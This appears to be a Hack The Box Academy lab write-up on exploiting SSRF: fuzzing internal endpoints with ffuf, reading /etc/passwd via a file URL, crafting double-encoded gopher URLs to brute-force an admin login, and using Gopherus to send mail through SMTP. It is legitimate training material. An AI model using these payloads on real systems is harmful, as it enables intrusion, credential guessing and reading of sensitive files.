Continuing from b-Identify SSRF, let’s move on to exploitation part.
Accessing Restricted Endpoint
Let’s use ffuf to directory bruteforce for more open pages.
Server at dataserver.htb Port 80 is used to filter out HTTP 403 responses below:
jadu101@htb[/htb]$ ffuf -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -u http://172.17.0.2/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://dateserver.htb/FUZZ.php&date=2024-01-01" -fr "Server at dateserver.htb Port 80"
<SNIP>
[Status: 200, Size: 361, Words: 55, Lines: 16, Duration: 3872ms]
* FUZZ: admin
[Status: 200, Size: 11, Words: 1, Lines: 1, Duration: 6ms]
* FUZZ: availabilityLFI
We can use such command below to read /etc/passwd file:
dateserver=file///etc/passwd&date=2024-01-01
Gopher Protocol
Let’s say we found a login form as admin.php:
dateserver=http://dateserver.htb/admin.php&date=2024-01-01
We need to send a POST request with the credentials, but we cannot do so with the http:// URL scheme.
We can use gopher URL scheme to send arbitrary bytes to a TCP socket.
Let’s say we want to try common password such as admin, we can send the following POST request:
POST /admin.php HTTP/1.1
Host: dateserver.htb
Content-Length: 13
Content-Type: application/x-www-form-urlencoded
adminpw=adminWe are going to URL encode all special characters and construct a valid gopher URL (spaces (%20) and newlines (%0D%0A) must be URL-encoded).
When converted to gopher URL scheme, above POST request will look like below:
gopher://dateserver.htb:80/_POST%20/admin.php%20HTTP%2F1.1%0D%0AHost:%20dateserver.htb%0D%0AContent-Length:%2013%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0A%0D%0Aadminpw%3Dadmin
Now let’s inject above’s gopher command to our original POST request.
Since we are sending our URL within the HTTP POST parameter dateserver, which itself is URL-encoded, we need to URL-encode the entire URL again to ensure the correct format of the URL after the web server accepts it.
POST /index.php HTTP/1.1
Host: 172.17.0.2
Content-Length: 265
Content-Type: application/x-www-form-urlencoded
dateserver=gopher%3a//dateserver.htb%3a80/_POST%2520/admin.php%2520HTTP%252F1.1%250D%250AHost%3a%2520dateserver.htb%250D%250AContent-Length%3a%252013%250D%250AContent-Type%3a%2520application/x-www-form-urlencoded%250D%250A%250D%250Aadminpw%253Dadmin&date=2024-01-01Upon sending the above traffic, we can try whether the password worked out or not.
Imagine we identified SSRF vulnerability and TCP port 25 is open locally, we can do so many thing using this.
Gopherus
Constructing gopher URLs can be tricky so we can use tool such as Gopherus to generate gopher URLs for us.
The following services are supported:
- MySQL
- PostgreSQL
- FastCGI
- Redis
- SMTP
- Zabbix
- pymemcache
- rbmemcache
- phpmemcache
- dmpmemcache
We need Python2 for running this tool.
Let’s try generating a valid SMTP URL by supplying the corresponding argument.
Tool asks us for input details about the email we intend to send. Afterward, we are given a valid gopher URL that we can use in our SSRF exploitation:
jadu101@htb[/htb]$ python2.7 gopherus.py --exploit smtp
________ .__
/ _____/ ____ ______ | |__ ___________ __ __ ______
/ \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/
\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \
\______ /\____/| __/|___| /\___ >__| |____//____ >
\/ |__| \/ \/ \/
author: $_SpyD3r_$
Give Details to send mail:
Mail from : attacker@academy.htb
Mail To : victim@academy.htb
Subject : HelloWorld
Message : Hello from SSRF!
Your gopher link is ready to send Mail:
gopher://127.0.0.1:25/_MAIL%20FROM:attacker%40academy.htb%0ARCPT%20To:victim%40academy.htb%0ADATA%0AFrom:attacker%40academy.htb%0ASubject:HelloWorld%0AMessage:Hello%20from%20SSRF%21%0A.
-----------Made-by-SpyD3r-----------